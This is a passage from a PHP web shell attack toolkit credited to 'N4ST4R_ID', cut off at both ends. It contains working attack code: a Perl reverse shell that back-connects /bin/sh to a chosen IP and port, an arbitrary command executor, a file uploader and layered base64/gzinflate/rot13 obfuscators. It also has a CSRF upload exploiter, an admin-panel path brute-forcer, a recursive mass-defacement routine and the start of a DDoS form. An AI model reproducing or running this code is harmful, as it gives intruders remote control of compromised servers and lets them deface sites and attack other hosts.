  746. break;case 'str_rot13' : $codi=str_rot13($text);
  747. break;case 'sha1' : $codi=sha1($text);
  748. break;case 'strlen' : $codi=strlen($text);
  749. break;case 'xxx' : $codi=strlen(bin2hex($text));
  750. break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
  751. break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
  752. break;case 'www' : $codi=chr($text);
  753. break;case 'sss' : $codi=htmlspecialchars($text);
  754. break;case 'eee' : $codi=addslashes($text);
  755. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  756. break;default:break;}}
  757.  
  758. $submit = $_POST['crack'];
  759. if (isset($submit)){
  760. $op = $_POST["ope"];
  761. switch ($op) {case 'base64': $codi=base64_decode($text);
  762. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  763. break;case 'json' : $codi=utf8_dencode(json_dencode($text));
  764. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  765. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  766. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  767. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  768. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  769. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  770. break;case 'urlencode' : $codi=rawurldecode($text);
  771. break;case 'hexencode' : $codi=quoted_printable_decode($text);
  772. break;case 'ur' : $codi=convert_uudecode($text);
  773. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  774. break;default:break;}}
  775. $html = htmlentities(stripslashes($codi));
  776. echo "<from><center><h3><font size=4 face=chiller color=aqua>N4ST4R_ID/h3></center><textarea cols=70 rows=20 style='onfocus();font-weight:bold;color:red;background-image: transparent;opacity:0.40;background-size:100%;background-repeat: no-repeat;' class='inputz' readonly>".$html."</textarea><BR/><BR/></center></from>";
  777. ?>
  778. <footer style="text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000; position:fixed; left:1px; right:0px; top:0px; border-bottom: 1px solid red ;">
  779. <center><b><font face="Quicksand" color="black" size="3" style="text-shadow: 0 0 5px #2f2b2b, 0 0 10px #2f2b2b, 0 0 20px #2f2b2b, 0 0 45px #2f2b2b, 0 0 40px #2f2b2b;">
  780. <font face="Agency FB" color="red" size="4" style="text-shadow: 0 0 6px black, 0 0 5px black, 0 0 5px black;"></footer>
  781. <?php
  782.     } elseif($_GET['do'] == 'shellscanner') {
  783. ?>
  784. <script language="JavaScript" type="text/JavaScript">
  785. <!--
  786. function MM_openBrWindow(theURL,winName,features) { //v2.0
  787.   window.open(theURL,winName,features)
  788. }
  789. //-->
  790. </script>
  791. <style type="text/css">
  792. <!--
  793. .single{
  794.    border: 1px solid #00ff00;box-shadow: 0px 0px 15px #55FF55;
  795.    padding: 5px;
  796. }
  797. .me  {
  798.    font-size:11px; font-family:Tahoma,Verdana,Arial; color:#ccff99;
  799.    border: 0px;
  800.    padding: 5px;
  801. }
  802.  
  803. .isi{
  804.    padding: 2px;
  805.    border:1px solid #ffffff;
  806.    font-family: Tahoma;
  807.    color: #ccff99;
  808.    background-color: #ffffff;
  809.    font-size: 10px;
  810.    font-weight: bold;
  811. }
  812. -->
  813. </style>
  814. <style type="text/css">
  815. #patch {position:absolute; height:1; width:1px; top:0; left:0;}
  816. </style>
  817. </head>
  818. <body>
  819. <center>
  820. <img src="http://kodbul.org/img/konuayirac/siyahyuruyen.gif">
  821. <center><font color="#339900" size="14" face="arial">Backdoor Scanner</font></center><br>
  822. <?php
  823. if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
  824.    if(isset($_POST['yes'])){
  825.       $filename = $_GET['file'];
  826.       echo "<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";
  827.       unlink($filename);
  828.       echo "<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
  829.    }else{
  830.       if($_POST['update']) {
  831.          $filename = $_POST['file'];
  832.          if(is_writable($filename)) {
  833.             $handle = fopen($filename, "w+");
  834.             $isi=$_POST['content'];
  835.             fwrite($handle, stripslashes($isi));
  836.             fclose($handle);
  837.             $stat= "<center><strong>edited successfully<br>";
  838.          } else {
  839.             $stat= "<center><font color=red><strong>Error! File may not be writable.</font></center>";
  840.          }
  841.       }
  842.       if($_POST['close']) {
  843.          echo "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
  844.       }
  845.       $filename = $_GET['file'];
  846.       if (file_exists($filename)){
  847.          $vuln = $_GET['bug'];
  848.          $handle = fopen($filename, "r");
  849.          $contents = fread($handle, filesize($filename));
  850.       ?>
  851.       <center>
  852.       <table>
  853.          <tr><td align="left" class="me"><strong><?=$filename?>&nbsp;&nbsp;>> Contains :&nbsp;<?=$vuln?></strong></td></tr>
  854.          <tr><td class="me">
  855.             <form method="post" action="">
  856.             <input type="hidden" name="file" value="<?=$filename?>">
  857.             <textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea><br>
  858.          </td></tr>
  859.          <tr><td align="center" class="me">
  860.          <?php
  861.          if($_POST['delete']) {
  862.             echo "Are you sure to delete ".$filename." ?";
  863.          ?>
  864.          <tr><td align="center" class="me">
  865.             <input type="submit" name="yes" value=" Y E S ">
  866.             <input type="submit" name="no" value=" N O ">
  867.          </td></tr>
  868.          <?php
  869.          }else{
  870.          echo $stat;
  871.          ?>
  872.          </td></tr>
  873.          <tr><td align="right" class="me">
  874.             <input type="submit" name="close" value=" C l o s e ">
  875.             <input type="submit" name="delete" value=" D e l e t e ">
  876.             <input type="submit" name="update" value=" S a v e ">
  877.          </td></tr>
  878.          <?php
  879.          }
  880.          fclose($handle);
  881.          ?>
  882.       </table>
  883. </form>
  884. <?php
  885. }else{
  886. echo "<br><br><br><font color=red size=3><b><center>".$filename." not exist...</b></font><br><br><br><br><br><br><br>";
  887. echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
  888. }
  889. ?>
  890. </center>
  891. <?php
  892. }
  893. }elseif(isset($_POST['Submit'])){
  894.    $ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  895.    foreach($ceks as $ceker){
  896.       if($_POST[$ceker]<>""){
  897.          $six.=$_POST[$ceker].".";
  898.       }
  899.    }
  900.    
  901. $cek = explode('.', $six);
  902.  
  903. function ListFiles($dir) {
  904.     if($dh = opendir($dir)) {
  905.  
  906.         $files = Array();
  907.         $inner_files = Array();
  908.  
  909.         while($file = readdir($dh)) {
  910.             if($file != "." && $file != "..") {
  911.                 if(is_dir($dir . "/" . $file)) {
  912.                     $inner_files = ListFiles($dir . "/" . $file);
  913.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  914.                 } else {
  915.                     array_push($files, $dir . "/" . $file);
  916.                 }
  917.             }
  918.         }
  919.  
  920.         closedir($dh);
  921.         return $files;
  922.     }
  923. }
  924.    ?>
  925.    <center>
  926.    <table border="0" width="90%" cellpadding="5">
  927.       <tr>
  928.          <td align="right" width="30"><b>No</b></td>
  929.          <td align="center" width="105"><b> T y p e </b></td>
  930.          <td align="center"><b> F i l e&nbsp;&nbsp;L o c a t i o n </b></td>
  931.          <td align="center" width="150"><b> L a s t&nbsp;&nbsp;E d i t </b></td>
  932.          <td  align="right" width="80"><b>F i l e&nbsp;&nbsp;S i z e</b></td>
  933.       </tr><br>
  934. <?php
  935. $target=$_SERVER['DOCUMENT_ROOT'];
  936.    foreach (ListFiles($target) as $key=>$file){
  937.       $nFile = substr($file, -4, 4);
  938.       if($nFile == ".php"){
  939.          if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
  940.          }else{
  941.             $ops = @file_get_contents($file);
  942.             $op=strtolower($ops);
  943.             $arr = array('c99_buff_prepare' => 'c 9 9',
  944.                       'abcr57' => 'r 5 7');
  945.             $sis=0;
  946.             if($op)
  947.             $size=filesize($file);
  948.  
  949.             $last=date("M-d-Y H:i", $last_modified);
  950.             foreach($arr as $key => $val) {
  951.                if(@preg_match("/$key/", $op)) {
  952.                   $sis=1;
  953.                   $i++;
  954.                   ?>
  955.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  956.                      <td align="right"><font color="red"><blink><?=$i?></blink></font></td>
  957.                      <td align="center"><font color="red"><blink><?=$val?></blink></font></td>
  958.                      <td align="left"><blink>
  959.                      <a href="#" class="abunai" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  960.                      </blink></td>
  961.                      <td align="center"><font color="red"><blink><?=$last?> GMT+9</blink></font></td>
  962.                      <td align="right"><font color="red"><blink><?=$size?> byte</blink></font></td>
  963.                      <script language="javascript">
  964.                         var bgcolor = "transparent";
  965.                         var change_color = "#444444"
  966.                         function mover(aa) {
  967.                            aa.style.backgroundColor = change_color;
  968.                         }
  969.                         function mout(aa) {
  970.                            aa.style.backgroundColor = bgcolor;
  971.                         }
  972.                      </script>
  973.                   </tr>
  974.                   <?php
  975.                }
  976.             }
  977.             if($sis<>"1"){
  978.                if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
  979.                   $sis="2";
  980.                   $i++;
  981.                   $val="hidden shell";
  982.                   ?>
  983.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  984.                      <td align="right"><font color="blue"><?=$i?></font></td>
  985.                      <td align="center"><font color="blue"><?=$val?></font></td>
  986.                      <td align="left">
  987.                      <a href="#" class="xxx" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  988.                      </td>
  989.                      <td align="center"><font color="blue"><?=$last?> GMT+9</font></td>
  990.                      <td align="right"><font color="blue"><?=$size?> byte</font></td>
  991.                      <script language="javascript">
  992.                         var bgcolor = "transparent";
  993.                         var change_color = "#444444"
  994.                         function mover(aa) {
  995.                            aa.style.backgroundColor = change_color;
  996.                         }
  997.                         function mout(aa) {
  998.                            aa.style.backgroundColor = bgcolor;
  999.                         }
  1000.                      </script>
  1001.                   </tr>
  1002.                   <?php
  1003.                }
  1004.             }
  1005.             if($sis=="0"){
  1006.             foreach($cek as $bugs) {
  1007.                 if ($bugs<>""){
  1008.                if(@preg_match("/$bugs\((.*?)\)/", $op)) {
  1009.                   $i++;
  1010.                   ?>
  1011.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  1012.                      <td align="right"><?=$i?></td>
  1013.                      <td align="center"><?=$bugs?></td>
  1014.                      <td align="left">
  1015.                      <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  1016.                      </td>
  1017.                      <td align="center"><?=$last?> GMT+9</td>
  1018.                      <td align="right"><?=$size?> byte</td>
  1019.                      <script language="javascript">
  1020.                         var bgcolor = "transparent";
  1021.                         var change_color = "#444444"
  1022.                         function mover(aa) {
  1023.                            aa.style.backgroundColor = change_color;
  1024.                         }
  1025.                         function mout(aa) {
  1026.                            aa.style.backgroundColor = bgcolor;
  1027.                         }
  1028.                      </script>
  1029.                   </tr>
  1030.                   <?php
  1031.                }              
  1032.             }
  1033.             }
  1034.             }
  1035.             if($_POST['textV']<>""){
  1036.                $text=$_POST['textV'];
  1037.                   if(@preg_match("/$text/", $op)) {
  1038.                   $i++;
  1039.                   ?>
  1040.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  1041.                      <td align="right"><?=$i?></td>
  1042.                      <td align="center"><?=$text?></td>
  1043.                      <td align="left">
  1044.                      <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  1045.                      </td>
  1046.                      <td align="center"><?=$last?> GMT+9</td>
  1047.                      <td align="right"><?=$size?> byte</td>
  1048.                      <script language="javascript">
  1049.                         var bgcolor = "transparent";
  1050.                         var change_color = "#444444"
  1051.                         function mover(aa) {
  1052.                            aa.style.backgroundColor = change_color;
  1053.                         }
  1054.                         function mout(aa) {
  1055.                            aa.style.backgroundColor = bgcolor;
  1056.                         }
  1057.                      </script>
  1058.                   </tr>
  1059.                   <?php
  1060.                }
  1061.            
  1062.            
  1063.             }
  1064.          }
  1065.       }
  1066.    }
  1067.    if($i==0){
  1068.       foreach($cek as $bugs) {
  1069.          if ($bugs<>""){
  1070.             $x++;
  1071.    ?>
  1072.       <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  1073.          <td align="right"><?=$x?></td>
  1074.          <td align="center"><?=$bugs?></td>
  1075.          <td align="center"> not exist </td>
  1076.          <td align="center"> no record </td>
  1077.          <td align="right"> -&nbsp;&nbsp;&nbsp;&nbsp;byte </td>
  1078.       </tr>
  1079.    <?php
  1080.          }
  1081.       }
  1082.    }
  1083.    ?>
  1084.    </table>
  1085.    <?php
  1086. }else{
  1087.    $find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  1088. ?>
  1089.    <form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
  1090.    <center>
  1091.    <table class="single" width="400" border="1" -webkit-box-shadow: 0px 0px 15px #55FF55; cellpadding="10">
  1092.    <tr><td class="me"><center>
  1093.      
  1094.       <table class="me" width="200">
  1095.          <tr><td class="me">
  1096.             <script language="javascript">
  1097.                function cekKlik(){  
  1098.                   if (!document.fCheck.cekV.checked)
  1099.                      document.fCheck.textV.disabled=true;  
  1100.                   else
  1101.                      document.fCheck.textV.disabled=false;
  1102.                   if(document.fCheck.cekV.checked){
  1103.                      master = master + 1;
  1104.                   }else{
  1105.                      if(master > 0 ){
  1106.                         master = master - 1;
  1107.                      }else{
  1108.                         master = master;
  1109.                      }
  1110.                   }
  1111.                   if(master != 0){
  1112.                      document.fCheck.Submit.disabled=false;
  1113.                   }else{
  1114.                      document.fCheck.Submit.disabled=true;
  1115.                   }        
  1116.                }    
  1117.             </script>  
  1118.             <?php
  1119.             //dari sini
  1120.             foreach($find as $bug) {
  1121.             ?>
  1122.             <script language="javascript">
  1123.                var master = 0;
  1124.                function checkValue<?=$bug?>(){
  1125.                   if(document.fCheck.<?=$bug?>.checked){
  1126.                      master = master + 1;
  1127.                   }else{
  1128.                      if(master > 0 ){
  1129.                         master = master - 1;
  1130.                      }else{
  1131.                         master = master;
  1132.                      }
  1133.                   }
  1134.                   if(master != 0){
  1135.                      document.fCheck.Submit.disabled=false;
  1136.                   }else{
  1137.                      document.fCheck.Submit.disabled=true;
  1138.                   }  
  1139.                }
  1140.             </script>
  1141.             <input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" />&nbsp;<?=$bug?><br>
  1142.             <?php
  1143.             }
  1144.             ?>
  1145.             <input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
  1146.             <input class="isi" disabled="disabled" name="textV" value="other key word" onFocus="this.select()" type="text" id="textV">
  1147.             <br><br>
  1148.             <input type="hidden" name="asal" value="abcd">
  1149.             <input disabled="disabled" type="submit" name="Submit" value=" Start " />
  1150.          </td></tr>
  1151.       </table>
  1152.    </td></tr></table>
  1153.    </form>
  1154. <?php
  1155. }
  1156. ?>
  1157. <br><br><hr width="300">
  1158. <?php
  1159.     } elseif($_GET['do'] == 'bconnet') {
  1160.         echo '<div id="login" style="margin-top: 10px; margin-left: 10px;">';
  1161.         echo '<form action="?page=bcon" method="get"><input type="hidden" name="page" value="bcon"/>';
  1162.         echo 'IP:<br><input type="text" name="ip" value="'.getenv("remote_addr").'" style="margin-top: 5px;"/><br><br>';
  1163.         echo 'Port:<input type="submit" value="Connect" style="margin-left: 130px; margin-top: -4px;"/><br><input type="text" name="port" value="666" style="margin-top: 5px;"/>';
  1164.         echo '</form>';
  1165.         echo '</div>';
  1166.         if(isset($_GET['ip']) && isset($_GET['port'])){
  1167.             $ip = $_GET['ip'];
  1168.             $port = $_GET['port'];
  1169.             $bc = fopen("/tmp/bxcon.pl","w");
  1170.             fwrite($bc,'#!/usr/bin/perl
  1171. use Socket;
  1172. $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
  1173. $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
  1174. $proto=getprotobyname("tcp");
  1175. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  1176. connect(SOCKET, $paddr) || die("Error: $!\n");
  1177. open(STDIN, ">&SOCKET");
  1178. open(STDOUT, ">&SOCKET");
  1179. open(STDERR, ">&SOCKET");
  1180. system("/bin/sh -i");
  1181. close(STDIN);
  1182. close(STDOUT);
  1183. close(STDERR);');
  1184.             fclose($bc);
  1185.             shell_exec("perl /tmp/bxcon.pl");
  1186.             unlink("/tmp/bxcon.pl");
  1187.         }
  1188.     break;
  1189.  
  1190.  
  1191.  
  1192. echo '</td>
  1193. </tr>
  1194. </table>
  1195. <br><center>xB1N4RYx ~ 2012</center><br>
  1196. </body>
  1197. </html>';
  1198. function rooting()
  1199. {
  1200. echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
  1201. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1202. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1203. if( $_POST['_upl'] == "Upload" ) {
  1204.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
  1205.     else { echo '<b>Basarisiz</b><br><br>'; }
  1206. }
  1207. }
  1208. $x = $_GET["x"];
  1209. Switch($x){
  1210. case "rooting";
  1211.     rooting();
  1212.     break;
  1213.    
  1214.       }
  1215.    
  1216.         } elseif($_GET['do'] == 'about') {
  1217. ?>
  1218. <br>
  1219. <audio autoplay loop><source src="http://www.gamamanagement.ro/Pachelbel's%20Canon%20in%20D%20on%20Harp%20HD.mp3"></audio>
  1220.     <div class="terimakasih">
  1221. <tr><td><center><font color="green">Insom Make Me
  1222.     <br>Destroy Some Security
  1223.     <br>Indonesian People  
  1224. <br><font color="red"> 10-03-2018 - Indonesia</font></font> <br>Create By N4ST4R_ID<br>Thanks To: All My Friend, And All Member Indonesian Error System.<br>Special Greats Google.
  1225.     <br><br><br><h1><font color='lime'>Kontak Me</h1><br>
  1226. <a href='mailto:esjetprotq@gmail.com'><img src='https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcQCxNnrXMMAv1L-nCq2EK_YHrZvB5gl3UnXYFsEUfsvi_cw8T2n2LNWtTGvng' width='35' height='30'></a>
  1227. <a href='https://m.facebook.com/mhd.rasyad.94'><img src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQoPPaJ9p-S0-kMM9IoAH0d3v7W1DIBxNvgyubBLcA97EqB_FHd' width='35' height='30'></a><br><br><br>
  1228. <img src='http://taxiforces.com/uploads/668c9e56813a5e6c9bc04ae43246a88e553cfdfb.jpg' width='300' height='300'>
  1229. </td></tr>
  1230.  
  1231.  
  1232.     <?php
  1233. } elseif($_GET['do'] == 'csrf') {
  1234. ?>      <html>
  1235. <title>CSRF EXPLOITER ONLINE</title>
  1236. <center><br><br><br><br>
  1237. <font color=red>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
  1238. <center>
  1239. <form method="post">
  1240. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1241. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Liat Diatas Goblok ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1242. <input type="submit" name="d" value="Lock!">
  1243. </form>
  1244. <?php
  1245. //gak penting
  1246.      @$url = $_POST['url'];
  1247.      @$pf = $_POST['pf'];
  1248.      @$d = $_POST['d'];
  1249. if($d) {
  1250.     //baccod
  1251.    
  1252.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Tusb00l Cok!'></form";
  1253. }
  1254. ?>
  1255. </form>
  1256. </html>
  1257. <?php
  1258.  
  1259. } elseif($_GET['do'] == 'admf') {
  1260.     ?>
  1261. <type='text/javascript'/></script>
  1262. <style>
  1263. </style>
  1264.  
  1265. </head>
  1266. <link rel="SHORTCUT ICON"  href="https://s19.postimg.org/5yad47qyr/image.png">
  1267. </style>
  1268. <br>
  1269. <br>
  1270. <br>
  1271. <td width=100% id=Gretz>
  1272. <form action="" method="post">
  1273. <center><p class="frontboxtext"><input name="hash_lol" class="textbox" type="text" size="30" value="http://www.target.co.il/"/>
  1274. <input name="submit_lol" class="textbox" value="Submit Site" type="submit">
  1275. </form>
  1276. <?php
  1277. set_time_limit(0);
  1278.  
  1279. if (isset($_POST["submit_lol"])) {
  1280. $url = $_POST['hash_lol'];
  1281. echo "<br />Crot ".$url."<br /><br />";
  1282.  
  1283. $adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin", "loginadmin3/",  "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "operator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellogin/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php", "admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", "author/login.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php","home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp", "memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel");
  1284.  
  1285. foreach ($adminlocales as $admin){
  1286. $headers = get_headers("$url$admin");
  1287. if (eregi('200', $headers[0])) {
  1288.     echo "<a href='$url/$admin'>$url$admin</a> Nemu Mhanxx!<br />";
  1289. }
  1290. else {
  1291.     echo "$url$Adm00n Gk ketemu!<br />";
  1292. }
  1293. }
  1294. }  
  1295. } elseif($_GET['do'] == 'cmd') {
  1296.     echo "<form method='post'>
  1297.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  1298.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  1299.     </form>";
  1300.     if($_POST['do_cmd']) {
  1301.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  1302.     }
  1303. } elseif($_GET['do'] == 'mass_deface') {
  1304.     function sabun_massal($dir,$namafile,$isi_script) {
  1305.         if(is_writable($dir)) {
  1306.             $dira = scandir($dir);
  1307.             foreach($dira as $dirb) {
  1308.                 $dirc = "$dir/$dirb";
  1309.                 $lokasi = $dirc.'/'.$namafile;
  1310.                 if($dirb === '.') {
  1311.                     file_put_contents($lokasi, $isi_script);
  1312.                 } elseif($dirb === '..') {
  1313.                     file_put_contents($lokasi, $isi_script);
  1314.                 } else {
  1315.                     if(is_dir($dirc)) {
  1316.                         if(is_writable($dirc)) {
  1317.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1318.                             file_put_contents($lokasi, $isi_script);
  1319.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1320.                         }
  1321.                     }
  1322.                 }
  1323.             }
  1324.         }
  1325.     }
  1326.     function sabun_biasa($dir,$namafile,$isi_script) {
  1327.         if(is_writable($dir)) {
  1328.             $dira = scandir($dir);
  1329.             foreach($dira as $dirb) {
  1330.                 $dirc = "$dir/$dirb";
  1331.                 $lokasi = $dirc.'/'.$namafile;
  1332.                 if($dirb === '.') {
  1333.                     file_put_contents($lokasi, $isi_script);
  1334.                 } elseif($dirb === '..') {
  1335.                     file_put_contents($lokasi, $isi_script);
  1336.                 } else {
  1337.                     if(is_dir($dirc)) {
  1338.                         if(is_writable($dirc)) {
  1339.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  1340.                             file_put_contents($lokasi, $isi_script);
  1341.                         }
  1342.                     }
  1343.                 }
  1344.             }
  1345.         }
  1346.     }
  1347.     if($_POST['start']) {
  1348.         if($_POST['tipe_sabun'] == 'mahal') {
  1349.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1350.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1351.             echo "</div>";
  1352.         } elseif($_POST['tipe_sabun'] == 'murah') {
  1353.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1354.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1355.             echo "</div>";
  1356.         }
  1357.     } else {
  1358.     echo "<center>";
  1359.     echo "<form method='post'>
  1360.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1361.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  1362.     <font style='text-decoration: underline;'>Folder:</font><br>
  1363.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1364.     <font style='text-decoration: underline;'>Filename:</font><br>
  1365.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1366.     <font style='text-decoration: underline;'>Index File:</font><br>
  1367.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by N4ST4R_ID</textarea><br>
  1368.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1369.     </form></center>";
  1370.     }
  1371. } elseif($_GET['do'] == 'ddos') {
  1372. ?>
  1373. <html>
  1374. <form action=" " method="post">
  1375. <center><br><br><br>
  1376. Your IP: <font color="white"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don't DoS yourself nub)<br><br>
  1377. <table class="tabnet" style="width:333px;padding:0 1px;">
  1378. <th colspan="5">Ddos Tool</th>
  1379. <tr><tr><td>IP Target</td><td>:</td>
  1380. <td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
  1381. </td></tr>
  1382. <tr><td>Time</td><td>:</td>
  1383. <td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
  1384. </td></tr>
  1385.  
